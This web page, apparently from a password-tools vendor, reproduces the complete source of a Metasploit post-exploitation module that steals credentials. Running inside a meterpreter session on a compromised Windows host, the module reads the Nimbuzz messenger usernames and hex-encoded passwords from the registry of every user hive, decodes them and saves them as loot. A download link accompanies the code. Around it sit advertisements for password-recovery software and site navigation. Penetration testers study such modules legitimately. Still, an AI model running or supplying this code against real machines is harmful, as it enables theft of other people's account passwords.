Today's Deals

Metasploit - Nimbuzz Instant Messenger Password Extractor Author: Silent Dream        See Also Index of all Password Tools Index of all Password Secrets Articles Metasploit - Trillian Messenger Password Extractor BrowserPasswordDecryptor - All in one Browser Password Recovery Software     Module Description This module extracts the account passwords saved by Nimbuzz Instant Messenger. It traverses through registry entries stored by Nimbuzz and automatically decodes & dumps all the account passwords.       Module Code Here is the complete Metasploit code for this module.   ## # $Id: enum_nimbuzz_pwds.rb 13399 2011-07-29 01:29:15Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'msf/core/post/windows/registry' class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report def initialize(info={}) super( update_info( info, 'Name' => 'Nimbuzz Instant Messenger Password Extractor', 'Description' => %q{ This module extracts the account passwords saved by Nimbuzz Instant Messenger in hex format. }, 'License' => MSF_LICENSE, 'Author' => [ 'sil3ntdre4m <sil3ntdre4m[at]gmail.com>', 'SecurityXploded Team', #www.SecurityXploded.com ], 'Version' => '$Revision: 13399 $', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) end def run creds = Rex::Ui::Text::Table.new( 'Header' => 'Nimbuzz Instant Messenger Credentials', 'Ident' => 1, 'Columns' => [ 'Username', 'Password' ] ) registry_enumkeys('HKU').each do |k| next unless k.include? "S-1-5-21" next if k.include? "_Classes" print_status("Looking at Key #{k}") if datastore['VERBOSE'] subkeys = registry_enumkeys("HKU\\#{k}\\Software\\Nimbuzz\\") if subkeys == nil or subkeys == "" print_status ("Nimbuzz Instant Messenger not installed for this user.") return end user = registry_getvaldata("HKU\\#{k}\\Software\\Nimbuzz\\PCClient\\Application\\", "Username") hpass = registry_getvaldata("HKU\\#{k}\\Software\\Nimbuzz\\PCClient\\Application\\", "Password") next if hpass == nil or hpass == "" hpass =~ /.{11}(.*)./ decpass = [$1].pack("H*") print_good("User=#{user}, Password=#{decpass}") creds << [user, decpass] end print_status("Storing data...") path = store_loot( 'nimbuzz.user.creds', 'text/plain', session, creds, 'nimbuzz_user_creds.txt', 'Nimbuzz User Credentials' ) print_status("Nimbuzz user credentials saved in: #{path}") end end     Download Here is the Metasploit download link to this module.   Download     References Source : Metasploit modules / post / windows / gather / enum_nimbuzz_pwds.rb   See Also Index of all Password Tools Index of all Password Secrets Articles Metasploit - Trillian Messenger Password Extractor BrowserPasswordDecryptor - All in one Browser Password Recovery Software               Today's Free Gift »» FREE Gift for You (worth $19.95) WiFi Password Recovery Pro Download Now Popular Software »» All-In-One Password Recovery Pro Download Now Top 10 Free Downloads »» WiFi Password Decryptor Asterisk Password Spy Product Key Decryptor Browser Password Decryptor Mail Password Decryptor FTP Password Decryptor Facebook Password Decryptor Google Password Decryptor Website Blocker WiFi Network Monitor Top 10 Pro Softwares »» All-In-One Password Recovery Pro All-In-One Key Finder Pro WiFi Password Recovery Pro Social Password Recovery Pro Google Password Recovery Pro Browser Password Recovery Pro Email Password Recovery Pro Asterisk Password Recovery Pro PDF Password Remover Pro Network SSL Certificate Scanner How to Recover Passwords »» How to Recover Facebook Password How to Recover Gmail Password How to Recover Instagram Password How to Recover Outlook Password How to Recover WiFi Password Latest Releases »» FireMaster v8.0 FireMaster Cracker v5.0 IE Password Decryptor v13.0 Outlook Password Decryptor v14.0 Foxmail Password Decryptor v7.0 Wi-Fi Network Monitor v7.0 Free PDF Password Protector v9.0 Free PDF Password Remover v13.0 Top Research Articles »» Password Secrets of Popular Windows Applications Penetration Testing with Metasploit Framework Reference Guide - Reversing & Malware Analysis Training Exposing Wireless Password Secrets & Techniques Hidden Rootkit Process Detection Our Enterprise Company www.XenArmor.com Testimonials »» "I have found 'SecurityXploded' tools to be an invaluable asset..." James Cadden, East Lansdowne Police, Pennsylvania, USA Awards »» Awards for our softwares from leading Download Sites

About SX About Company Awards Testimonials Contact Security Tools Enterprise Softwares Free Password Tools Wi-Fi Security Tools Anti Spyware Tools Windows Security Tools Resources Password Articles Security Articles Security Videos Metasploit Modules Software Pad Files Our Security Group XenArmor XenArmor Blog SecurityTrainings Security Blog SecurityXploded SecurityXploded - SAFE & SECURE Site Certification

SecurityXploded © 2007-2024, All rights reserved. Division of XenArmor Security Pvt Ltd. Sponsored Post  |  Advertise  |  Privacy  |  Terms  |  About  |  Contact